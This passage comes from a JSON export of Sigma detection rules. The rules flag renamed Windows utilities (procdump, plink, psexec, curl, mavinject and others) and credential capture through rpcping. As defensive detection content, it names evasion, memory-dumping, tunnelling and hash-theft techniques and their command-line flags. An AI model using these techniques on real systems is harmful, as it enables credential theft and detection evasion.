filter_main_known_names:\n        Image|endswith:\n            - '\\cloudflared.exe'\n            - '\\cloudflared-windows-386.exe'\n            - '\\cloudflared-windows-amd64.exe'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_createdump.yml",
    "content": "title: Renamed CreateDump Utility Execution\nid: 1a1ed54a-2ba4-4221-94d5-01dee560d71e\nrelated:\n    - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48\n      type: similar\nstatus: test\ndescription: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory\nreferences:\n    - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/\n    - https://twitter.com/bopin2020/status/1366400799199272960\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-20\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        OriginalFileName: 'FX_VER_INTERNALNAME_STR'\n    selection_cli:\n        - CommandLine|contains|all:\n              - ' -u ' # Short version of '--full'\n              - ' -f ' # Short version of '--name'\n              - '.dmp'\n        - CommandLine|contains|all:\n              - ' --full ' # Short version of '--full'\n              - ' --name ' # Short version of '--name'\n              - '.dmp'\n    filter:\n        Image|endswith: '\\createdump.exe'\n    condition: 1 of selection_* and not filter\nfalsepositives:\n    - Command lines that use the same flags\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_curl.yml",
    "content": "title: Renamed CURL.EXE Execution\nid: 7530cd3d-7671-43e3-b209-976966f6ea48\nstatus: test\ndescription: Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields\nreferences:\n    - https://twitter.com/Kostastsale/status/1700965142828290260\nauthor: X__Junior (Nextron Systems)\ndate: 2023-09-11\nmodified: 2023-10-12\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'curl.exe'\n        - Description: 'The curl executable'\n    filter_main_img:\n        Image|contains: '\\curl'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_curl/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml",
    "content": "title: Renamed ZOHO Dctask64 Execution\nid: 340a090b-c4e9-412e-bb36-b4b16fe96f9b\nstatus: test\ndescription: |\n    Detects a renamed \"dctask64.exe\" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\n    This binary can be abused for DLL injection, arbitrary command and process execution.\nreferences:\n    - https://twitter.com/gN3mes1s/status/1222088214581825540\n    - https://twitter.com/gN3mes1s/status/1222095963789111296\n    - https://twitter.com/gN3mes1s/status/1222095371175911424\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-01-28\nmodified: 2025-01-22\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1055.001\n    - attack.t1202\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Hashes|contains:\n            - 'IMPHASH=6834B1B94E49701D77CCB3C0895E1AFD'\n            - 'IMPHASH=1BB6F93B129F398C7C4A76BB97450BBA'\n            - 'IMPHASH=FAA2AC19875FADE461C8D89DCF2710A3'\n            - 'IMPHASH=F1039CED4B91572AB7847D26032E6BBF'\n    filter_main_legit_name:\n        Image|endswith: '\\dctask64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_ftp.yml",
    "content": "title: Renamed FTP.EXE Execution\nid: 277a4393-446c-449a-b0ed-7fdc7795244c\nstatus: test\ndescription: Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ftp/\nauthor: Victor Sergeev, oscd.community\ndate: 2020-10-09\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_original:\n        OriginalFileName: 'ftp.exe'\n    filter_img:\n        Image|endswith: '\\ftp.exe'\n    condition: selection_original and not filter_img\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_ftp/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml",
    "content": "title: Renamed Gpg.EXE Execution\nid: ec0722a3-eb5c-4a56-8ab2-bf6f20708592\nstatus: test\ndescription: Detects the execution of a renamed \"gpg.exe\". Often used by ransomware and loaders to decrypt/encrypt data.\nreferences:\n    - https://securelist.com/locked-out/68960/\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-08-09\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'gpg.exe'\n    filter_main_img:\n        Image|endswith:\n            - '\\gpg.exe'\n            - '\\gpg2.exe'\n    condition: selection and not 1 of filter_main_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_jusched.yml",
    "content": "title: Renamed Jusched.EXE Execution\nid: edd8a48c-1b9f-4ba1-83aa-490338cd1ccb\nstatus: test\ndescription: Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group\nreferences:\n    - https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf\nauthor: Markus Neis, Swisscom\ndate: 2019-06-04\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description:\n            - Java Update Scheduler\n            - Java(TM) Update Scheduler\n    filter:\n        Image|endswith: '\\jusched.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml",
    "content": "title: Renamed Mavinject.EXE Execution\nid: e6474a1b-5390-49cd-ab41-8d88655f7394\nstatus: test\ndescription: Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md\n    - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e\n    - https://twitter.com/gN3mes1s/status/941315826107510784\n    - https://reaqta.com/2017/12/mavinject-microsoft-injector/\n    - https://twitter.com/Hexacorn/status/776122138063409152  # Deleted tweet\n    - https://github.com/SigmaHQ/sigma/issues/3742\n    - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection\nauthor: frack113, Florian Roth\ndate: 2022-12-05\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055.001\n    - attack.t1218.013\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'mavinject32.exe'\n            - 'mavinject64.exe'\n    filter:\n        Image|endswith:\n            - '\\mavinject32.exe'\n            - '\\mavinject64.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_megasync.yml",
    "content": "title: Renamed MegaSync Execution\nid: 643bdcac-8b82-49f4-9fd9-25a90b929f3b\nstatus: test\ndescription: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.\nreferences:\n    - https://redcanary.com/blog/rclone-mega-extortion/\nauthor: Sittikorn S\ndate: 2021-06-22\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        OriginalFileName: 'megasync.exe'\n    filter:\n        Image|endswith: '\\megasync.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Software that illegally integrates MegaSync in a renamed form\n    - Administrators that have renamed MegaSync\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_msdt.yml",
    "content": "title: Renamed Msdt.EXE Execution\nid: bd1c6866-65fc-44b2-be51-5588fcff82b9\nstatus: test\ndescription: Detects the execution of a renamed \"Msdt.exe\" binary\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/\nauthor: pH-T (Nextron Systems)\ndate: 2022-06-03\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'msdt.exe'\n    filter:\n        Image|endswith: '\\msdt.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_renamed_msdt/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_msteams.yml",
    "content": "title: Renamed Microsoft Teams Execution\nid: 88f46b67-14d4-4f45-ac2c-d66984f22191\nstatus: test\ndescription: Detects the execution of a renamed Microsoft Teams binary.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-12\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName:\n            - 'msteams.exe'\n            - 'teams.exe'\n    filter_main_legit_names:\n        Image|endswith:\n            - '\\msteams.exe'\n            - '\\teams.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml",
    "content": "title: Renamed NetSupport RAT Execution\nid: 0afbd410-de03-4078-8491-f132303cb67d\nstatus: test\ndescription: Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Product|contains: 'NetSupport Remote Control'\n        - OriginalFileName|contains: 'client32.exe'\n        - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E\n    filter:\n        Image|endswith: '\\client32.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml",
    "content": "title: Renamed NirCmd.EXE Execution\nid: 264982dc-dbad-4dce-b707-1e0d3e0f73d9\nstatus: test\ndescription: Detects the execution of a renamed \"NirCmd.exe\" binary based on the PE metadata fields.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/\n    - https://www.nirsoft.net/utils/nircmd.html\nauthor: X__Junior (Nextron Systems)\ndate: 2024-03-11\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'NirCmd.exe'\n    filter_main_img:\n        Image|endswith:\n            - '\\nircmd.exe'\n            - '\\nircmdc.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_office_processes.yml",
    "content": "title: Renamed Office Binary Execution\nid: 0b0cd537-fc77-4e6e-a973-e53495c1083d\nstatus: test\ndescription: Detects the execution of a renamed office binary\nreferences:\n    - https://infosec.exchange/@sbousseaden/109542254124022664\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-20\nmodified: 2025-12-09\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName:\n              - 'Excel.exe'\n              - 'MSACCESS.EXE'\n              - 'MSPUB.EXE'\n              - 'OneNote.exe'\n              - 'OneNoteM.exe'\n              - 'OUTLOOK.EXE'\n              - 'POWERPNT.EXE'\n              - 'WinWord.exe'\n              - 'Olk.exe'\n        - Description:\n              - 'Microsoft Access'\n              - 'Microsoft Excel'\n              - 'Microsoft OneNote'\n              - 'Microsoft Outlook'\n              - 'Microsoft PowerPoint'\n              - 'Microsoft Publisher'\n              - 'Microsoft Word'\n              - 'Sent to OneNote Tool'\n    filter_main_legit_names:\n        Image|endswith:\n            - '\\EXCEL.exe'\n            - '\\excelcnv.exe'\n            - '\\MSACCESS.exe'\n            - '\\MSPUB.EXE'\n            - '\\ONENOTE.EXE'\n            - '\\ONENOTEM.EXE'\n            - '\\OUTLOOK.EXE'\n            - '\\POWERPNT.EXE'\n            - '\\WINWORD.exe'\n            - '\\OLK.EXE'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_paexec.yml",
    "content": "title: Renamed PAExec Execution\nid: c4e49831-1496-40cf-8ce1-b53f942b02f9\nrelated:\n    - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b\n      type: obsolete\nstatus: test\ndescription: Detects execution of renamed version of PAExec. Often used by attackers\nreferences:\n    - https://www.poweradmin.com/paexec/\n    - https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf\nauthor: Florian Roth (Nextron Systems), Jason Lynch\ndate: 2021-05-22\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'PAExec Application'\n        - OriginalFileName: 'PAExec.exe'\n        - Product|contains: 'PAExec'\n        - Hashes|contains:\n              - IMPHASH=11D40A7B7876288F919AB819CC2D9802\n              - IMPHASH=6444f8a34e99b8f7d9647de66aabe516\n              - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f\n              - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c\n    filter_main_known_location:\n        - Image|endswith: '\\paexec.exe'\n        - Image|startswith: 'C:\\Windows\\PAExec-'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Weird admins that rename their tools\n    - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing\n    - When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_pingcastle.yml",
    "content": "title: Renamed PingCastle Binary Execution\nid: 2433a154-bb3d-42e4-86c3-a26bdac91c45\nstatus: test\ndescription: Detects the execution of a renamed \"PingCastle\" binary based on the PE metadata fields.\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://www.pingcastle.com/documentation/scanner/\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-01-11\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName:\n              - 'PingCastleReporting.exe'\n              - 'PingCastleCloud.exe'\n              - 'PingCastle.exe'\n        - CommandLine|contains:\n              - '--scanner aclcheck'\n              - '--scanner antivirus'\n              - '--scanner computerversion'\n              - '--scanner foreignusers'\n              - '--scanner laps_bitlocker'\n              - '--scanner localadmin'\n              - '--scanner nullsession'\n              - '--scanner nullsession-trust'\n              - '--scanner oxidbindings'\n              - '--scanner remote'\n              - '--scanner share'\n              - '--scanner smb'\n              - '--scanner smb3querynetwork'\n              - '--scanner spooler'\n              - '--scanner startup'\n              - '--scanner zerologon'\n        - CommandLine|contains: '--no-enum-limit'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--level Full'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--server '\n    filter_main_img:\n        Image|endswith:\n            - '\\PingCastleReporting.exe'\n            - '\\PingCastleCloud.exe'\n            - '\\PingCastle.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - 
Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_plink.yml",
    "content": "title: Renamed Plink Execution\nid: 1c12727d-02bf-45ff-a9f3-d49806a3cf43\nstatus: test\ndescription: Detects the execution of a renamed version of the Plink binary\nreferences:\n    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\n    - https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-06\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'Plink'\n        - CommandLine|contains|all:\n              - ' -l forward'\n              - ' -P '\n              - ' -R '\n    filter:\n        Image|endswith: '\\plink.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml",
    "content": "title: Visual Studio NodejsTools PressAnyKey Renamed Execution\nid: 65c3ca2c-525f-4ced-968e-246a713d164f\nrelated:\n    - id: a20391f8-76fb-437b-abc0-dba2df1952c6\n      type: similar\nstatus: test\ndescription: Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries\nreferences:\n    - https://twitter.com/mrd0x/status/1463526834918854661\n    - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2023-04-11\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'Microsoft.NodejsTools.PressAnyKey.exe'\n    filter_main_legit_name:\n        Image|endswith: '\\Microsoft.NodejsTools.PressAnyKey.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml",
    "content": "title: Potential Renamed Rundll32 Execution\nid: 2569ed8c-1147-498a-9b8c-2ad3656b10ed\nrelated:\n    - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\n      type: derived\nstatus: test\ndescription: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection\nreferences:\n    - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20\n    - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-22\nmodified: 2023-02-03\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'DllRegisterServer'\n    filter:\n        Image|endswith: '\\rundll32.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_rurat.yml",
    "content": "title: Renamed Remote Utilities RAT (RURAT) Execution\nid: 9ef27c24-4903-4192-881a-3adde7ff92a5\nstatus: test\ndescription: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-19\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.collection\n    - attack.command-and-control\n    - attack.discovery\n    - attack.s0592\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Product: 'Remote Utilities'\n    filter:\n        Image|endswith:\n            - '\\rutserv.exe'\n            - '\\rfusclient.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_schtasks_execution.yml",
    "content": "title: Renamed Schtasks Execution\nid: f91e51c9-f344-4b32-969b-0b6f6b8537d4\nstatus: experimental\ndescription: |\n    Detects the execution of renamed schtasks.exe binary, which is a legitimate Windows utility used for scheduling tasks.\n    One of the very common persistence techniques is schedule malicious tasks using schtasks.exe.\n    Since, it is heavily abused, it is also heavily monitored by security products. To evade detection, threat actors may rename the schtasks.exe binary to schedule their malicious tasks.\nreferences:\n    - https://x.com/JangPr0/status/1932034543026065833\n    - https://ss64.com/nt/schtasks.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1036.003\n    - attack.t1053.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_cmd_operation:\n        CommandLine|contains|windash:\n            - ' /create '\n            - ' /delete '\n            - ' /query '\n            - ' /change '\n            - ' /run '\n            - ' /end '\n    selection_cmd_flags:\n        CommandLine|contains|windash:\n            - ' /tn '\n            - ' /tr '\n            - ' /sc '\n            - ' /st '\n            - ' /ru '\n            - ' /fo '\n    selection_pe:\n        OriginalFileName: 'schtasks.exe'\n    filter_main_cmd:\n        CommandLine|contains: 'schtasks'\n    filter_main_img:\n        Image|endswith: '\\schtasks.exe'\n    condition: (all of selection_cmd_* and not filter_main_cmd) or (selection_pe and not filter_main_img)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml",
    "content": "title: Renamed SysInternals DebugView Execution\nid: cd764533-2e07-40d6-a718-cfeec7f2da7f\nstatus: test\ndescription: Detects suspicious renamed SysInternals DebugView execution\nreferences:\n    - https://www.epicturla.com/blog/sysinturla\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-05-28\nmodified: 2023-02-14\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Product: 'Sysinternals DebugView'\n    filter:\n        OriginalFileName: 'Dbgview.exe'\n        Image|endswith: '\\Dbgview.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml",
    "content": "title: Renamed ProcDump Execution\nid: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67\nrelated:\n    - id: 03795938-1387-481b-9f4c-3f6241e604fe\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the execution of a renamed ProcDump executable.\n    This often done by attackers or malware in order to evade defensive mechanisms.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-11-18\nmodified: 2024-06-25\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_ofn:\n        OriginalFileName: 'procdump'\n    selection_cli_dump_flag:\n        CommandLine|contains|windash:\n            - ' -ma ' # Full Dump\n            - ' -mp ' # Mini Plus\n    selection_cli_eula_flag:\n        # Note: Even though the \"accepteula\" flag isn't required. We add it to avoid collision with similar utilities.\n        CommandLine|contains|windash: ' /accepteula'\n    filter_main_known_names:\n        Image|endswith:\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n    condition: (selection_ofn or all of selection_cli_*) and not 1 of filter_main_*\nfalsepositives:\n    - Procdump illegally bundled with legitimate software.\n    - Administrators who rename binaries (should be investigated).\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml",
    "content": "title: Renamed PsExec Service Execution\nid: 51ae86a2-e2e1-4097-ad85-c46cb6851de4\nstatus: test\ndescription: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.youtube.com/watch?v=ro2QuZTIMBM\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-21\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'psexesvc.exe'\n    filter:\n        Image: 'C:\\Windows\\PSEXESVC.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate administrative tasks\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml",
    "content": "title: Renamed Sysinternals Sdelete Execution\nid: c1d867fe-8d95-4487-aab4-e53f2d339f90\nstatus: test\ndescription: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-06\nmodified: 2023-02-03\ntags:\n    - attack.impact\n    - attack.t1485\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'sdelete.exe'\n    filter:\n        Image|endswith:\n            - '\\sdelete.exe'\n            - '\\sdelete64.exe'\n    condition: selection and not filter\nfalsepositives:\n    - System administrator usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml",
    "content": "title: Renamed Vmnat.exe Execution\nid: 7b4f794b-590a-4ad4-ba18-7964a2832205\nstatus: test\ndescription: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading\nreferences:\n    - https://twitter.com/malmoeb/status/1525901219247845376\nauthor: elhoim\ndate: 2022-09-09\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'vmnat.exe'\n    filter_rename:\n        Image|endswith: 'vmnat.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_renamed_whoami.yml",
    "content": "title: Renamed Whoami Execution\nid: f1086bf7-a0c4-4a37-9102-01e573caf4a0\nstatus: test\ndescription: Detects the execution of whoami that has been renamed to a different name to avoid detection\nreferences:\n    - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/\n    - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-12\nmodified: 2022-10-09\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        OriginalFileName: 'whoami.exe'\n    filter:\n        Image|endswith: '\\whoami.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml",
    "content": "title: Capture Credentials with Rpcping.exe\nid: 93671f99-04eb-4ab4-a161-70d446a84003\nstatus: test\ndescription: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/\n    - https://twitter.com/vysecurity/status/974806438316072960\n    - https://twitter.com/vysecurity/status/873181705024266241\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-09\nmodified: 2025-10-31\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main_img:\n        - Image|endswith: '\\RpcPing.exe'\n        - OriginalFileName: '\\RpcPing.exe'\n    selection_main_flag:\n        CommandLine|contains|windash: '-s'\n    selection_cli_ntlm:\n        CommandLine|contains|windash: '-u'\n        CommandLine|contains: 'NTLM'\n    selection_cli_ncacn:\n        CommandLine|contains|windash: '-t'\n        CommandLine|contains: 'ncacn_np'\n    condition: all of selection_main_* and 1 of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml",
